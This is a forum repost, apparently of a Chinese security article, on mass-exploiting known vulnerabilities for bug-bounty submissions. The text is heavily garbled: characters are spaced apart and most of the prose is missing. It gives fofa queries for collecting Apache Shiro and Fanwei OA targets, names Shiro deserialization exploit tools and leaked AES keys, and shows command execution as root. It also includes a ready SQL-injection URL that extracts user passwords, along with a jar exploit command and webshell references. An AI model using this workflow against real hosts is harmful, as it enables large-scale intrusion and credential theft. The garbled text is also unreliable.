[22211] 2021-08-02_干货|批量漏洞挖掘思路小结

文档创建者:s7ckTeam
浏览次数:7
最后更新:2025-01-18
2021-08-02_干货|批量漏洞挖掘思路小结   L e m o n S e c   2 0 2 1 - 0 8 - 0 2 N d a y 1 d a y s r c S R C + + 0 x 0 1   S h i r o O A   V 8 S Q L 1 N d a y 1 d a y 2 3 f o f a A p i I P 4 I P 5 6 . s r c 0 x 0 2   S h i r o S h i r o c o o k i e c o o k i e k e y R e m e m b e r M e 使 a e s 使 b a s e 6 4 S h i r o S h i r o S h i r o f o f a a p p = " A p a c h e - S h i r o " h e a d e r = " r e m e m b e r m e = d e l e t e M e " h e a d e r = " s h i r o C o o k i e "
f o f a A p i I P h t t p s : / / g i t h u b . c o m / k - f i r e / f o f a - t o o l f o f a f o f a . i n i a p i I P 1 h t t p s : / / g i t h u b . c o m / a r n o 5 6 7 / S h i r o S c a n F 2 h t t p s : / / g i t h u b . c o m / s v 3 n b e a s t / S h i r o S c a n 1 使 使 S h i r o S c a n F 2 S h i r o S c a n y s o s e r i a l . j a r 3 访 访 h t t p : / / c e y e . i o / p r o f i l e d n s l o g p y t h o n 3   f o f a - a p i . p y { ' r u l e ' : ' a p p = " A p a c h e - S h i r o "   & &   h e a d e r = " r e m e m b e r m e = d e l e t e M e " ' , ' p a g e ' : ' ' , ' s i z e ' : ' 1 0 0 0 0 ' , ' f i e l d s ' : ' h o s t ' , ' i s _ f u l l ' : ' ' }
4 s h i r o F s c a n . p y 1 2 4 d n s l o g 5 f o f a a p i o u t . t x t u r l . t x t 6 S h i r o S c a n F p y t h o n 3   s h i r o F s c a n . p y
7 d n s l o g 8 1 h t t p s : / / g i t h u b . c o m / j 1 a n F e n / s h i r o _ a t t a c k / r e l e a s e s / t a g / 2 . 2 2 h t t p s : / / g i t h u b . c o m / f e i h o n g - c s / S h i r o E x p l o i t - D e p r e c a t e d / r e l e a s e s / t a g / v 2 . 5 1 1 s h i r o _ a t t a c k   k P H + b I x k 5 D 2 d e Z i I x c a a a A = =   s h i r o _ a t t a c k k P H + b I x k 5 D 2 d e Z i I x c a c a A = =
w h o a m i r o o t 2 S h i r o E x p l o i t
O A   V 8   S Q L O A   V 8 g e t d a t a . j s p g a t D a t a g e t D a t a c m d p r o c c m d r e q u e s t s e r v e r C o n t e x t c m d c m d g e t S e l e c t A l l I d s q l t y p e g e t S e l e c t A l l I d s s q l , t y p e P O C f o f a a p p = " - O A " f o f a A p i I P h t t p s : / / g i t h u b . c o m / k - f i r e / f o f a - t o o l h t t p : / / x x x . x x x . x x x . x x x / j s / h r m / g e t d a t a . j s p ? c m d = g e t S e l e c t A l l I d & s q l = s e l e c t % 2 0 p a s s w o r d % 2 0 a s % 2 0 i d % 2 0 f r o m % 2 0 H r m R e s o u r c e M a n a g e r
I P h t t p s : / / g i t h u b . c o m / Y a n g 0 6 1 5 7 7 7 / P o c L i s t 1 f o f a A P I 2 访 访 h t t p : / / x . x . x . x / l o g i n / L o g i n . j s p ? l o g i n t y p e = 1 O A   v 8 p y t h o n 3   f o f a - a p i . p y { ' r u l e ' : ' a p p = " - O A " ' , ' p a g e ' : ' ' , ' s i z e ' : ' 1 0 0 0 0 ' , ' f i e l d s ' : ' h o s t ' , ' i s _ f u l l ' : ' ' } j a v a   - j a r   F a n W e i O A - V 8 - S Q L i n j e c t i o n . j a r
3 S Q L P O C h t t p : / / x . x . x . x / j s / h r m / g e t d a t a . j s p ? c m d = g e t S e l e c t A l l I d & s q l = s e l e c t % 2 0 p a s s w o r d % 2 0 a s % 2 0 i d % 2 0 f r o m % 2 0 H r m R e s o u r c e M a n a g e r 4 m d 5   A S D $ % ^ 1 2 3 5
0 x 0 3   m a c 0 x 0 1 s h e l l | 穿   w e b s h e l l K 8 S t r u t s 2 L e m o n S e c h t t p : / / 3 3 h . c o / w b b u b
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则